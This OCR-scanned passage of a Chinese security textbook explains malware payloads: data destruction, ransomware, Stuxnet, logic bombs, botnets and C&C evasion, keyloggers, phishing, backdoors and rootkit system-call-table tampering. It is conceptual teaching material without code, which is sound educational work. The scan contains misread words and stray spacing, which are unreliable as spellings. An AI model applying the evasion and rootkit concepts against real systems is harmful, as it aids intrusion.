城 门 。 希 腊 军队 开始 了 一 场 大 屠杀 ， 导 致 了 特洛伊 城 的 毁灭 和 所 有 市 民 沦 为 奴隶 。 
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们 分 布 在 官方 的 网 站 中 。 但 是 ， 很 多 版 本 的 IOS 系统 包含 一 些 与 图 形 或 PDF 操作 有 关 的 漏洞 。 
实际 上 这 些 漏 洞 正 是 iOS“ 越 狱 ” 的 主要 途径 ， 但 它们 也 给 恶意 软件 侵入 手 机 开辟 了 通道 。 虽 
然 苹果 公司 修复 了 许多 漏洞 ， 但 是 新 的 变种 仍然 陆续 被 发 现 。 这 恰恰 从 侧面 表明 了 ， 即 便 是 对 
资金 和 资源 充足 的 组 织 而 言 ， 在 一 个 复杂 的 系统 (例如 一 个 操作 系统 ) 内 编写 安全 软件 有 多 人 么 
的 困难 。 第 10 和 11 章 还 会 再 回 到 这 个 话题 。 


6.6 载荷 - 系统 损坏 


一 旦 恶意 软件 在 目标 系统 中 启动 ， 下 一 步 需 要 关心 的 就 是 其 在 系统 中 会 有 什么 样 的 行为 ， 
也 就 是 : 恶意 软件 携带 什么 样 的 载荷 。 一 些 恶 意 软件 并 不 携带 载荷 或 仅仅 携带 无 任何 功能 的 
载荷 。 此 种 恶意 软件 无 论 是 故意 地 或 因 意 外 而 被 过 早 地 释放 出 来 ， 其 唯一 的 目的 是 传播 恶意 
软件 。 更 普遍 的 情况 是 ， 恶 意 软 件 携带 有 一 个 或 多 个 可 以 为 攻击 者 实施 某 些 秘密 行为 的 有 效 
载荷 。 

一 种 可 见于 许多 病毒 和 蠕虫 中 的 早期 有 效 载 荷 可 以 在 特定 的 触发 条 件 被 满足 时 对 被 感染 系 
统 的 数据 造成 破坏 [WEAV03]。 与 此 相关 的 一 种 载荷 在 触发 时 会 在 用 户 的 系统 中 显示 一 些 不 受 
欢迎 的 消息 或 内 容 。 而 另 一 个 更 加 恶劣 的 载荷 变种 则 试图 对 系统 造成 实际 的 损害 。 所 有 这 些 行 
为 针对 的 是 计算 机 系统 硬件 或 软件 又 或 者 是 用 户 数据 的 完整 性 。 这 些 行为 可 能 不 会 立刻 就 显现 
出 来 ， 而 是 仅仅 在 满足 特定 的 触发 条 件 并 触发 恶意 软件 中 的 逻辑 炸弹 代码 时 才 显现 。 


6.6.1 数据 损坏 


CIH (Chernobyl) 病毒 是 一 个 早期 的 例子 ， 首 次 发 现 于 1998 年 ， 它 是 一 个 有 破坏 性 的 、 
寄生 性 的 、 内 存 驻 留 性 质 的 病毒 ， 运 行 于 Windows 95 和 98 系统 上 。 它 会 在 可 执行 文件 被 打开 
时 感染 它们 。 当 触发 日 期 一 到 ， 它 会 通过 重 写 硬 盘 从 0 开始 的 第 一 个 兆 字 节 的 数据 以 删除 被 感 
染 系统 中 的 数据 ， 导 致 整个 文件 系统 的 大 面积 损坏 。 该 病毒 首次 发 作 于 1999 年 4 月 26 日 ， 据 
估计 有 100 万 以 上 的 计算 机 被 感染 。 

与 之 类 似 ， 求 职 信 (Klez) 蠕虫 是 早期 的 一 个 损害 型 蠕虫 的 例子 ， 它 感染 从 Windows 95 
到 Windows XP 的 一 系列 操作 系统 ， 首 次 发 现 于 2001 年 10 月 。 求 职 信 和 蠕虫 通过 电子 邮件 ， 向 
用 户 地 址 短 中 的 邮箱 地 址 和 系统 中 的 文件 传播 自身 的 拷贝 。 它 可 以 暂停 和 删除 一 些 运行 在 系统 
中 的 反 病 毒 程序 。 在 发 作 日 期 ， 即 每 年 某 几 个 月 的 13 号 ， 它 会 清空 本 地 硬盘 下 的 文件 。 

除了 单纯 地 破坏 数据 ， 某 些 恶意 软件 会 加 密 用 户 数据 ， 然 后 向 用 户 索要 赎金 才 可 以 恢复 数 
据 。 这 种 恶意 软件 有 时 被 称 为 勒索 软件 ( ransomware)。1989 年 发 现 的 Cyborg 木马 就 是 早期 的 
例子 。 但 是 ， 到 了 2006 年 年 中 ,涌现 出 一 批 使 用 公 钥 密码 算法 和 越 来 越 长 的 密 钥 对 数据 进行 
加 密 的 蠕虫 和 木马 (如 Gpcode 木马 )。 用 户 必须 支付 赎金 ， 或 在 指定 网 站 进行 支付 才 可 以 拿 到 
解密 的 密 钥 。 虽 然 早 期 使 用 弱 加 密 技 术 的 勒索 软件 有 可 能 不 支付 赎金 便 能 破解 ， 但 是 同样 的 方 
法 对 于 近期 使 用 长 密 钥 公 钥 密码 算法 的 勒索 软件 便 无 能 为 力 了 。 文 献 [SYMA13] 指出 勒索 软件 
是 一 个 越 来 越 大 的 挑战 ， 通 常 利用 夹带 式 下 载 进 行 传播 。 


6.6.2 物理 损害 


损坏 系统 类 有 效 载荷 的 进一步 变种 的 目标 是 引起 物理 设备 的 损害 。 受 感染 的 系统 显然 是 最 
容易 受害 的 目标 设备 。 刚 才 提 到 的 CH 病毒 不 仅 和 毁坏 数据 ， 还 会 试图 重 写 用 于 引导 计算 机 启 
动 的 BIOS 代码 。 如 果 成 功 ， 引 导 过 程 则 会 失效 ， 系 统 无 法 使 用 ， 除 非 重新 写 人 BIOS 代码 或 
更 换 BIOS 芯片 。 

最 近 ， 我 们 先前 讨论 的 震 网 (Stuxnet) 蠕虫 ， 其 有 效 载荷 以 一 些 特殊 工业 控制 系统 为 目标 
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[CHEN11，KUSH13]。 如 果 一 个 使 用 特定 的 西门 子 工业 控制 软件 并 处 于 特定 设置 下 的 控制 系统 
被 感染 ， 蠕 虫 会 替换 系统 中 原始 的 控制 代码 ， 令 控制 设备 偏离 其 正常 的 运行 范围 ， 导 致 该 系统 
控制 的 设备 停止 运转 。 伊 朗 铀 浓缩 项 目 使 用 的 离心 机 被 高 度 怀疑 是 震 网 蠕虫 的 目标 ， 因 为 在 该 
蜂 虫 活动 的 时 候 ， 这 一 设备 的 故障 率 远 高 于 正常 水 平 。 如 我 们 先前 讨论 所 指出 的 ， 震 网 蠕虫 提 
高 了 对 使 用 复杂 和 有 针对 性 的 恶意 软件 产生 的 工业 设备 破坏 问题 的 关注 。 


6.6.3 ”逻辑 炸弹 


数据 损坏 型 恶意 软件 一 个 重要 的 组 成 部 分 是 逻辑 炸弹 。 逻 辑 炸 弹 是 嵌入 在 恶意 软件 中 的 代 
码 ， 在 特定 条 件 满 足 时 便 会 “爆炸 ”。 能 够 引爆 逻辑 炸弹 的 条 件 很 多 ， 例 如 某 个 特定 的 文件 存 
在 与 否 、 某 个 特定 的 日 期 或 星期 几 、 运 行程 序 的 某 个 特定 用 户 等 。 逻 辑 炸 弹 一 旦 被 引爆 ， 它 会 
修改 或 删除 数据 或 所 有 文件 ， 导 致 宕 机 或 者 其 他 破坏 。 

有 关 逻 辑 炸弹 的 一 个 释 动 性 事件 是 Tim Lloyd 案例 。Tim Lloyd 的 逻辑 炸弹 使 他 所 在 的 
Omega Engineering 公司 蒙受 了 1000 多 万 美元 的 损失 ， 打 乱 了 公司 制定 的 发 展 战略 ， 而 且 还 导 
致 了 80 名 工人 失业 [GAUD00]。Tim Lloyd 也 因此 被 判处 41 个 月 监禁 ， 并 责令 他 支付 200 万 
美元 的 赔偿 金 。 


6.7 载荷 - 攻击 代理 - zombie, bot 


我 们 讨论 的 下 一 类 有 效 载荷 可 以 使 得 攻击 者 能 够 偷偷 地 使 用 受 感染 的 系统 的 计算 资源 和 网 
络 资源 。 此 种 被 感染 的 系统 被 称 为 僵尸 机 (在 英文 中 它们 有 bot, robot, zombie, drone 等 多 种 
称谓 )， 它 会 秘密 地 控制 一 台 连 接 Internet 的 计算 机 ， 并 利用 所 控制 的 计算 机 发 动 攻击 ， 这 样 使 
追踪 僵尸 机 变 得 很 困难 。 僵 尸 机 经 常 被 “种 植 ”在 属于 可 信 的 第 三 方 的 成 百 上 千 台 计算 机 上 。 
大 量 的 僵尸 机 能 够 以 一 种 协调 的 方式 行动 ; 这 样 的 一 大 群 僵尸 机 就 组 成 了 僵尸 网 络 botnet). 
这 一 类 型 的 有 效 载 荷 所 攻击 的 ， 是 被 感染 系统 的 完整 性 和 可 用 性 。 


6.7.1 bot 的 用 途 


文献 [HONE05] 列 出 了 bot 的 如 下 用 途 : 

分 布 式 拒绝 服务 攻击 (DDoS) : DDoS 攻击 是 一 种 通过 攻击 一 个 计算 机 或 者 网 络 而 使 用 

户 不 能 获得 正常 服务 的 攻击 。 我 们 在 第 7 章 中 分 析 DDoS 攻击 。 

发 送 垃圾 邮件 (spamming): 通过 控制 僵尸 网 络 和 其 中 大 量 的 bot， 攻 击 者 可 以 发 送 大 

量 的 垃圾 邮件 。 

嗅 探 通信 流量 ( sniffing traffic): bot 可 以 使 用 数据 包 嗅 探 工 具 来 查看 经 过 受 控 主机 的 

数据 包 ， 寻 找 那 些 感 兴趣 的 明文 数据 。 嗅 探 经 常 被 用 来 获取 用 户 名 和 口令 这 样 的 敏感 

数据 。 

o 记录 键盘 (keylogging) : 如 果 受 控 主 机 使 用 了 加 密 的 通信 信道 (例如 HTTPS 或 
POP3S)， 那 么 单纯 地 嗅 探 网 络 数据 包 是 无 价值 的 ， 因 为 攻击 者 无 法 获得 对 应 的 解密 数 
据 包 的 密 钥 。 但 是 通过 使 用 键盘 记录 器 来 捕获 受 控 主 机 上 的 键盘 输入 ， 攻 击 者 还 是 能 
够 获得 敏感 的 数据 的 。 实 施 过 滤 机 制 (例如 , “我 只 对 “paypalcom ”关键 字 附 近 的 键 
盘 输入 序列 感 兴趣 ”) 使 bot 能 够 进一步 窃取 受 控 主 机 上 的 秘密 数据 。 

o 传播 新 的 恶意 软件 ( spreading new malware): 僵尸 网 络 还 可 以 用 来 传播 新 的 bot。 这 是 
非常 简单 的 ， 因 为 所 有 bot 都 实现 了 通过 HTTP 或 FTP 下 载 并 执行 一 个 文件 的 机 制 。 
一 个 拥有 一 万 台 主 机 的 僵尸 网 络 可 以 作为 蠕虫 或 者 电子 邮件 病毒 的 开始 基点 ， 从 而 使 
它们 得 以 迅速 地 传播 ， 进 而 导致 更 大 的 破坏 。 
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e 安装 广告 插件 和 浏览 器 辅助 插件 installing advertisement add-ons and browser helper 
objects (BHO)): 僵尸 网 络 也 能 够 用 来 获得 经 济 利益 。 这 是 通过 先 建立 一 个 带 有 一 些 广 
告 的 虚假 网 站 ， 网 站 的 管理 者 和 那些 能 够 为 广告 点 击 付费 的 公司 达成 交易 。 利 用 僵尸 
网 络 ， 并 且 使 点 击 操作 可 以 自动 执行 ， 那 么 就 可 以 使 这 些 广告 迅速 有 成 千 上 万 的 点 击 
量 。 更 进一步 的 发 展 是 让 bot 劫持 受 控 主 机 的 起 始 页 ， 这 样 每 当 该 主机 的 用 户 打开 浏 
览 器 时 都 会 自动 点 击 广告 。 
攻击 IRC 聊天 网 络 (attacking IRC chat network): 僵尸 网 络 也 可 以 用 来 攻击 Internet 中 
继 聊天 (Internet Relay Chat, IRC) 网 络 。 克 隆 攻击 是 比较 流行 的 攻击 。 在 这 种 攻击 中 ， 
攻击 者 命令 每 一 个 bot 将 其 大 量 的 克隆 体 连 接 到 目标 IRC 网 络 。 受 害 网 络 会 被 来 自 成 
千 上 万 的 bot 或 者 成 千 上 万 的 克隆 bot 的 加 入 通道 的 服务 请 求 所 淹没 。 这 样 受害 的 IRC 
网 络 就 瘫痪 了 ， 这 很 类 似 于 分 布 式 拒 绝 服 务 攻 击 。 
© 操纵 在 线 投票 或 游戏 (manipulating online polls/game) : 在 线 投票 和 游戏 越 来 越 受 到 关 
注 ， 而 且 用 僵尸 网 络 操纵 它们 也 是 很 容易 的 。 因 为 每 一 个 bot 都 有 一 个 不 同 的 他 地址 ， 
因此 每 一 票 都 和 真实 用 户 的 投票 有 相同 的 可 信和 度 。 在 线 游戏 可 以 用 相似 的 方法 操纵 。 


6.7.2 ”远程 控制 功能 


是 否 具有 远程 控制 功能 是 bot 与 蠕虫 的 区 别 所 在 。 蠕 虫 是 自我 复制 并 自我 激活 ， 而 bot 是 
由 某 种 形式 的 指挥 控制 (C&C) 服务 器 网 络 控制 的 。 这 种 控制 通信 不 需要 是 持续 性 的 ， 而 可 以 
在 僵尸 机 发 现 自己 被 接 人 网 络 时 周期 性 地 建立 。 

早期 实现 远程 控制 的 工具 是 IRC 服务 器 。 所 有 的 bot 都 会 加 入 这 个 服务 器 的 一 个 特定 通道 
中 ， 并 把 通道 中 收 到 的 消息 当 作 命令 处 理 。 近 来 越 来 越 多 的 僵尸 网 络 已 经 避免 使 用 IRC 机 制 
了 ， 转 而 利用 协议 〈 例 如 HTTP 协议 ) 来 实现 隐蔽 通信 通道 。 利 用 点 对 点 通信 协议 的 分 布 式 控 
制 机 制 也 是 一 种 可 用 的 控制 方法 ， 以 避免 单一 控制 节点 容易 失效 的 不 足 。 

最 初 ， 这 些 C&C 服务 器 使 用 固定 IP 地址 ， 故 其 很 容易 被 定位 并 被 执法 机 构 接管 或 捣毁。 
近期 的 恶意 软件 家 族 则 用 上 了 一 些 新 技术 ， 如 自动 生成 大 量 服务 器 域名 并 令 恶意 软件 尝试 与 所 
有 这 些 域名 进行 连接 。 如 此 ， 一旦 其 中 一 个 服务 器 名 称 被 破坏 ,攻击 者 可 以 利用 这 些 一 定 会 被 
尝试 的 域名 中 的 某 一 个 来 重新 建立 服务 器 。 对 抗 这 一 技术 需要 借助 逆向 工程 以 分 析 其 域名 生成 
算法 ， 然 后 试图 获得 对 所 有 这 些 ( 而 数量 显然 是 极 大 的 ) 域名 的 控制 。 另 一 种 隐藏 服务 器 的 技 
术 是 快速 变迁 域名 ( fast-flux DNS) 技术 一 一 令 与 给 定 服务 器 域名 相关 联 的 IP 地 址 频繁 地 变动 
(通常 每 隔 几 分 钟 变 动 一 次 )， 并 在 大 量 服务 器 代理 中 轮转 ， 而 这 些 代理 往往 是 僵尸 网 络 的 其 他 
成 员 。 这 些 措施 都 会 阻止 执法 机 构 有 效 地 应 对 僵尸 网 络 所 带 来 的 威胁 。 

当 控 制 模块 和 bot 的 通信 通道 建立 后 ， 控 制 模块 就 可 以 操纵 bot 了 。 最 简单 的 方式 就 是 ， 
控制 模块 可 以 轻松 地 向 bot 发 送 命 令 ， 让 bot 去 执行 一 个 已 经 在 bot 上 设 定 好 的 例 程 。 更 灵活 
的 方式 是 ， 控 制 模块 向 bot 发 送 更 新 命令 ,命令 它们 从 某 个 Intemet 地 址 上 下 载 一 个 程序 ， 然 
后 执行 这 个 程序 。 后 一 种 方法 使 bot 变 成 一 种 能 够 实现 多 种 攻击 的 更 通用 的 工具 。 这 种 控制 模 
块 也 可 以 收集 bot 的 信息 ,攻击 者 可 以 在 随后 进行 攻击 。 


6.8 载荷 - 信息 窃取 -键盘 记录 器 、 网 络 钓鱼 、 间 谍 软 件 


现在 讨论 用 于 收集 存储 在 被 感染 系统 中 的 数据 的 载荷 。 此 类 载荷 的 一 个 共同 目的 是 获得 用 
户 在 银行 、 游 戏 或 其 他 相关 网 站 的 登录 名 和 口令 ， 由 此 使 得 攻击 者 可 以 利用 上 述 信息 模拟 正常 
用 户 来 获得 这 些 网 站 的 登 人 权限 。 它 们 有 时 也 可 能 以 文档 或 系统 的 配置 细节 作为 目标 ， 达 到 侦 
听 和 间谍 的 目的 (尽管 这 相对 不 那么 常见 )。 此 类 载荷 所 针对 的 是 目标 信息 的 机 密 性 。 
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6.8.1 ”凭证 盗窃 、 键 盘 记 录 器 和 间谍 软件 


一 般 ， 用 户 通过 加 密 信道 (例如 HTTP 或 POP3S) 向 银行 、 游 戏 或 相关 网 站 发 送 他 们 的 登 
录 名 和 口令 凭证 ， 以 保护 这 些 信息 不 被 侦 听 网 络 数据 包 截 获 。 为 了 绕 过 这 个 防护 ， 攻 击 者 可 以 
安装 一 个 键盘 记录 器 ( keylogger) 以 抓 取 被 感染 机 器 中 的 键 击 信息 ， 从 而 攻击 者 可 以 监视 那些 敏 
感 信息 。 由 于 键盘 记录 器 会 抓 取 被 感染 机 器 上 所 有 文本 输入 的 拷贝 ， 它 们 一 般 都 会 设置 一 些 过 
滤 机 制 以 便 只 记录 与 攻击 者 想 要 的 关键 字 相 近 的 信息 〈 如 “登录 名 ”口令 ”或 “paypaLcom”)。 

为 了 应 对 键盘 记录 器 ， 一 些 银行 或 其 他 网 站 转 而 使 用 一 个 图 形 化 的 小 程序 来 输入 关键 
信息 ， 诸 如 口令 。 因 为 图 形 化 的 小 程序 不 使 用 键盘 输入 文本 ， 所 以 传统 的 键盘 记录 器 不 能 
获取 此 类 信息 。 为 了 对 付 这 个 保护 方法 ,攻击 者 开发 了 更 加 通用 的 间谍 软件 用 以 监听 受害 
系统 中 更 多 种 类 的 活动 。 这 可 能 包括 监视 历史 记录 和 浏览 内 容 ， 更 改 某 一 网 页 至 攻击 者 控 
制 的 虚假 网 站 ， 动 态 修 改 浏览 器 和 网 站 的 交换 数据 。 所 有 这 些 会 导致 用 户 私 人 信息 遭 到 严 
重 的 侵害 。 

由 犯罪 软件 工具 包 制 作 的 Zeus 网 银 木马 是 此 类 间谍 软件 中 一 个 杰出 的 代表 ， 在 近年 来 被 
广泛 地 部 署 [BINS10]。 它 利用 键盘 记录 器 盗 取 银 行 和 金融 凭证 ， 可 能 修改 某 些 网 站 的 表单 数 
据 。 它 通常 利用 垃圾 电子 邮件 或 通过 一 个 含有 夹带 式 下 载 的 有 害 网 站 进行 部 署 。 


6.8.2 ”网 络 钓鱼 和 身份 盗窃 


另 一 种 用 于 获取 用 户 登 录 名 和 口令 凭证 的 方法 是 在 垃圾 邮件 中 包含 指向 被 攻击 者 控制 的 虚 
假 网 站 URL (统一 资源 定位 符 )， 并 让 这 个 虚假 网 站 模仿 一 些 银行 、 游 戏 或 其 他 类 似 网 站 的 登 
录 界 面 。 此 类 邮件 通常 包含 有 提示 用 户 需 要 紧急 验证 他 们 的 账户 以 免 被 锁定 的 消息 。 如 果 用 户 
不 加 小 心 ， 没 有 发 现 自己 正 受到 诈骗 ， 跟 随 链 接 并 提供 了 需要 的 细节 信息 ， 就 无 疑 会 导致 攻击 
者 利用 截获 的 凭证 信息 攻陷 用 户 的 账户 。 

更 普遍 的 是 ， 利 用 此 类 垃圾 邮件 引导 用 户 至 攻击 者 的 虚假 网 站 ， 或 让 用 户 填写 随 信 附 上 
的 某 些 表格 并 回复 给 攻击 者 ， 以 便 收 集 用 户 的 个 人 隐私 信息 。 得 到 了 足够 的 信息 ， 攻 击 者 可 以 
“猜测 ”用 户 的 身份 ， 从 而 获得 信用 信息 或 其 他 资源 的 访问 权限 。 这 被 称 作 钓鱼 攻击 一 一 利用 
社会 工程 学 ， 伪 装 成 可 信 来 源 的 通信 取得 用 户 的 信任 [GOLD10]。 

用 于 钓鱼 攻击 的 垃圾 电子 邮件 经 常 通过 僵尸 网 络 被 广泛 地 分 发 至 大 量 的 用 户 。 虽 然 邮 件 内 
容 与 一 大 部 分 收 件 人 的 可 信 来 源 是 不 匹配 的 ， 但 是 对 攻击 者 而 言 ， 只 要 这 些 邮 件 分 发 至 足够 多 
用 户 ， 而 其 中 有 一 部 分 用 户 最 终 上 当 ， 他 们 就 有 利 可 图 。 

一 个 更 为 危险 的 变种 是 鱼 又 式 网 络 钓 鱼 (spear-phishing)。 它 同样 是 一 封 声 称 来 自 可 信 来 
源 的 电子 邮件 。 不 同 的 是 ， 邮 件 的 收 件 人 事先 已 经 受到 了 攻击 者 的 认真 研究 ， 因 为 每 封 邮件 都 
是 精心 制作 的 以 迎合 相应 的 收 件 人 (通常 是 通过 引用 一 系列 信息 以 说 服 收 件 人 相信 邮件 的 可 靠 
性 )。 这 大 大 增加 了 收 件 人 像 攻 击 者 所 期 望 的 那样 做 出 响应 的 可 能 性 。 此 类 攻击 特别 用 于 工业 
和 其 他 形式 的 间谍 活动 中 ， 由 具有 良好 资源 的 组 织 进行 [SYMA13]。 


6.8.3 侦察、 间谍 和 数据 渗 漏 


凭据 盗窃 和 身份 盗窃 是 侦察 型 载荷 中 的 特殊 例子 ， 其 目的 是 获得 想 要 的 信息 并 反馈 给 攻 
击 者 。 这 些 特 殊 的 例子 当然 是 更 加 常见 的 ， 但 是 也 有 其 他 类 型 的 攻击 目标 为 人 所 知 。2009 年 
的 极光 行动 (Operation Aurora) 利用 木马 获取 权限 ， 并 有 可 能 修改 了 一 些 高 科技 公司 、 安 全 
公司 和 防务 承包 商 的 源 代 码 库 [SYMA13]。2010 年 发 现 的 震 网 蠕虫 通过 获取 硬件 和 软件 的 
配置 细节 以 确定 其 是 否 已 人 侵 了 特定 的 目标 系统 。 震 网 的 一 些 早 期 版 本 会 将 其 所 获取 的 这 些 
配置 信息 反馈 给 攻击 者 ， 从 而 使 这 些 信 息 可 以 被 用 来 开发 其 后 续 版 本 中 要 部 署 的 具体 攻击 
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高 级 持续 性 威胁 攻击 可 能 导致 大 量 敏感 数据 的 丢失 ， 这 些 丢 失 的 数据 会 被 发 送 (MAB 
R) 至 攻击 者 处 。 检 测 和 防止 此 类 数据 泄露 需要 合适 的 技术 性 “数据 丢失 ”应 对 方法 ， 要 么 对 
数据 的 访问 权限 实施 管理 ， 要 么 对 越过 所 有 者 网 络 边界 数据 传输 进行 控制 。 


6.9 载荷 - 隐蔽 - 后 门 、rootkit 


我 们 讨论 的 最 后 一 类 载荷 是 恶意 软件 用 来 隐蔽 其 在 被 感染 系统 中 的 存在 和 提供 侵入 系统 权 
限 的 技术 。 这 类 载荷 同样 也 攻击 系统 的 完整 性 。 


6.9.1 后 门 


后 门 (backdoor) 也 被 称 为 陷 门 (trapdoor)， 它 是 进入 一 个 程序 的 秘密 入 口 ， 使 得 知情 者 
不 经 过 通常 的 安全 访问 程序 而 获取 访问 权限 。 多 年 来 ， 后门 一 直 被 程序 员 合理 地 用 于 程序 的 调 
试 和 测试 。 这 样 的 后 门 被 称 为 维护 挂 钓 ( maintenance hook)。 当 程序 员 开 发 具有 身份 认证 或 者 
很 长 的 配置 过 程 的 应 用 程序 而 需要 用 户 输入 许多 不 同 值 时 ， 往 往 会 用 到 后 门 。 因 为 在 调试 这 些 
程序 时 ， 开 发 人 员 希 望 获得 一 些 特 权 或 者 避免 所 有 必要 的 配置 和 认证 过 程 。 程 序 设计 者 设置 后 
门 的 另 一 个 目的 是 ， 确 保 当 嵌入 到 应 用 程序 中 的 认证 机 制 发 生 错误 时 ， 还 有 其 他 激活 程序 的 方 
法 。 后 门 是 能 够 识别 一 些 特殊 的 输入 序列 或 者 当 被 某 个 用 户 ID 运行 或 某 个 不 可 能 的 事件 序列 
发 生 所 触发 的 代码 。 

当 程 序 员 肆 无 忌 习 地 使 用 后 门 获得 非 授 权 访 问 时 ， 后 门 就 变 成 了 一 种 安全 威胁 。 在 电影 
《 War Games 》 中 描述 的 漏洞 的 基本 思想 来 自 于 后 门 。 另 一 个 例子 是 ， 在 Multics 系统 的 开发 过 
程 中 ， 美 国 空军 “老虎 队 ”( 模 拟 攻击 者 ) 负责 对 该 系统 进行 渗透 测试 。 渗 透 所 用 的 策略 之 一 就 
是 向 一 个 运行 Multics 系统 的 站 点 发 送 伪 造 的 操作 系统 升级 程序 ， 升 级 程序 包含 一 个 能 够 通过 
后 门 激活 的 特洛伊 木马 程序 (木马 程序 将 在 后 面 讨论 )， 通 过 这 个 木马 程序 ， 老 虎 队 能 够 获得 
Multics 系统 的 访问 权限 。 这 个 威胁 设计 得 非常 巧妙 以 至 于 Multics 的 开发 人 员 在 被 告知 这 种 威 
胁 真 实 存在 后 ， 都 没 法 找到 它 [ENGE80]。 

近期 ， 后 门 通常 当 作 网 络 服务 监听 在 一 些 攻击 者 能 够 连接 的 非 标 准 端口 上 实现 ， 通 过 运行 
后 门 向 受害 系统 发 送 命令 。 

由 于 很 难 通 过 操作 系统 对 后 门 进行 控制 。 因 此 针对 后 门 的 安全 措施 必须 重点 关注 程序 的 开 
发 过 程 和 软件 的 更 新 活动 。 


6.9.2 rootkit 


rootkit 是 安装 在 系统 中 用 来 支持 以 管理 员 (或 root) 权限 9 对 系统 进行 访问 的 一 组 程序 。 
有 了 管理 员 的 权限 就 可 以 使 用 操作 系统 的 所 有 功能 和 服务 。rootkit 以 恶意 且 隐 项 的 方式 更 改 主 
机 的 标准 功能 。 获 得 管理 员 权限 后 ， 黑 客 就 完全 控制 了 该 系统 ， 并 能 够 添加 或 修改 程序 和 文 
件 ， 监 控 当 前 进程 ， 发 送 和 接收 网 络 通信 ， 并 且 如 果 需 要 的 话 还 可 以 设置 后 门 。 

rootkit 能 够 对 系统 进行 很 多 的 修改 来 隐藏 自己 ， 使 用 户 很 难 察觉 到 rootkit 的 存在 ， 也 很 
难 确定 它 对 系统 进行 了 哪些 修改 。 其 实 ，rootkit 是 通过 破坏 系统 对 进程 、 文 件 、 注 册 表 的 监控 
和 报告 机 制 而 实现 隐藏 的 。 

rootkit 可 以 以 如 下 特征 进行 分 类 : 


O UNIX 系统 上 ,管理 员 或 者 超级 用 户 账号 被 称 为 rrot， 因 此 管理 员 权限 ， 也 称 为 root 权限 。 
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© 持续 的 ( persistent) : 系统 每 一 次 启动 都 会 被 激活 。rootkit 必须 把 它 的 代码 存储 在 持续 
性 存储 如 注册 表 或 文件 系统 中 ， 并 配置 一 种 方式 使 它 不 需要 用 户 干预 就 可 以 自己 执行 。 
e 基于 内 存 的 (memory based): 没有 持续 性 ， 重 启 后 rootkit 就 会 失效 。 
o 用 户 模式 (user mode): 截获 API (应 用 程序 接口 ) 调用 ， 并 修改 返回 值 。 例 如 ， 当 一 
个 应 用 程序 执行 列 出 目录 中 文件 的 操作 时 ， 使 得 返回 结果 中 不 包括 与 rootkit 相关 的 
文件 。 
© 内 核 模式 〈(kemel mode): 能 够 截获 对 本 地 内 核 模式 5 的 API 调用 。rootkit 还 能 够 通过 
删除 内 核 的 活动 进程 列表 中 的 恶意 软件 进程 来 隐藏 自己 。 
o 基于 虚拟 机 的 (virtual machine based): 此 类 rootkit 会 首先 安装 一 个 轻 量 级 虚拟 机 监视 
器 ， 然 后 在 监视 器 之 上 的 虚拟 机 中 运行 操作 系统 。 这 样 一 来 ，rootkit 就 能 够 对 已 经 虚 
拟 化 的 系统 中 所 发 生 的 状态 和 事件 进行 透明 地 截获 和 修改 。 
e 外 部 模式 (external mode) : 将 恶意 软件 植 人 目标 系统 的 正常 运行 模式 之 外 ， 如 机 器 的 
BIOS 中 或 系统 管理 模式 中 等 ， 这 样 它 就 可 以 直接 获得 硬件 的 访问 权限 。 
这 个 分 类 展示 了 一 个 持续 性 的 军备 竞赛 ; 一 方 是 rootkit 作者 ， 他 们 利用 更 加 隐藏 的 机 制 
来 隐藏 他 们 的 代码 ; 另 一 方 则 是 那些 开发 系统 加 固 机 制 以 对 抗 rootkit 的 破坏 ， 或 者 在 其 发 生 
时 予以 检测 的 开发 者 们 。 许 多 这 样 的 进展 是 寻找 更 加 “底层 ”形式 的 攻击 。 早 期 的 rootkit 工 
作 在 用 户 模 式 下 ， 通 过 修改 实用 程序 和 库 来 隐藏 自身 。 他 们 所 做 的 修改 可 以 被 内 核 中 的 代码 检 
测 到 ， 因 为 系统 内 核 运 行 在 用 户 模式 的 底层 。 新 一 代 的 rootkit 使 用 了 更 加 隐蔽 的 技术 ,我们 
接 下 来 会 讨论 这 方面 的 内 容 。 


6.9.3 ”内 核 模式 下 的 rootkit 


下 一 代 的 rootkit 向 底层 移动 ， 在 内 核 中 进行 修改 ， 与 操作 系统 代码 共存 ， 这 使 得 它们 更 
难 被 检测 到 。 任 何 反 病 毒 程序 现在 都 服从 来 自 与 rootkit 用 于 隐藏 自身 的 相同 “底层 ”的 修改 。 
但 是 ， 有 方法 可 以 检测 这 些 变化 。 

在 用 户 级 运行 的 程序 是 通过 系统 调用 来 与 内 核 交 互 的 。 因 此 ， 系 统 调用 是 内 核 级 rootkit 
实现 隐藏 的 主要 目标 。 作 为 rootkit 如 何 操作 的 一 个 例子 ， 我 们 来 看 一 下 Linux 系统 调用 的 实 
现 。 在 Linux 中 ， 每 一 个 系统 调用 都 会 被 分 配 一 个 唯一 的 系统 调用 编号 。 当 一 个 用 户 模式 的 进 
程 执行 系统 调用 时 ， 该 进程 是 通过 系统 调用 编号 来 引用 系统 调用 的 。 内 核 维护 着 一 张 系统 调用 
表 ， 每 一 项 对 应 着 一 个 系统 调用 ， 其 中 每 项 的 内 容 是 对 应 系统 调用 例 程 的 人 口 地 址 。 系 统 调用 
编号 就 是 这 个 调用 在 表 中 的 索引 。 

[LEVI06] 列 出 了 3 种 可 以 用 来 修改 系统 调用 的 技术 : 

e 修改 系统 调用 表 (modify the system call table): 黑客 修改 存储 在 系统 调用 表 中 的 选 定 的 
系统 调用 的 地 址 。 这 样 rootkit 就 把 系统 调用 从 原来 合法 的 例 程 指向 了 rootkit 所 指定 的 
程序 上 。 图 6-4 显示 了 knark rootkit 是 如 何 实现 的 。 

© 修改 系统 调用 表 的 目标 对 象 (modify system call table target): 黑客 用 恶意 代码 覆盖 了 所 
选 定 的 正常 系统 调用 例 程 ， 而 系统 调用 表 没 有 被 修改 。 

e 重 定向 系统 调用 表 (redirect the system call table): 黑客 把 对 整个 系统 调用 表 的 引用 重 定 
向 到 新 的 内 核 存储 单元 中 的 一 个 新 表 上 。 


日 ”内 核 是 操作 系统 的 一 部 分 ,包括 使 用 最 频繁 和 最 关键 的 软件 部 分 。 内 核 模 式 是 为 内 核 保留 的 特权 执行 模式 。 


通常 ， 内 核 模式 允许 访问 在 非特 权 模 式 下 运行 的 进程 所 不 能 访问 的 主 存 区 域 ， 还 能 执行 仅 能 在 内 核 模式 下 
执行 的 某 些 机 器 指令 。 
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a) 正 常 的 内 核 存储 配置 b) nkark 安 装 之 后 的 情形 
6-4 rootkit 对 系统 调用 表 的 修改 


6.9.4 虚拟 机 和 其 他 外 部 rootkit 


最 新 一 代 的 rootkit 使 用 的 代码 对 目标 操作 系统 完全 不 可 见 。 代 码 通常 实现 为 某 种 流氓 式 
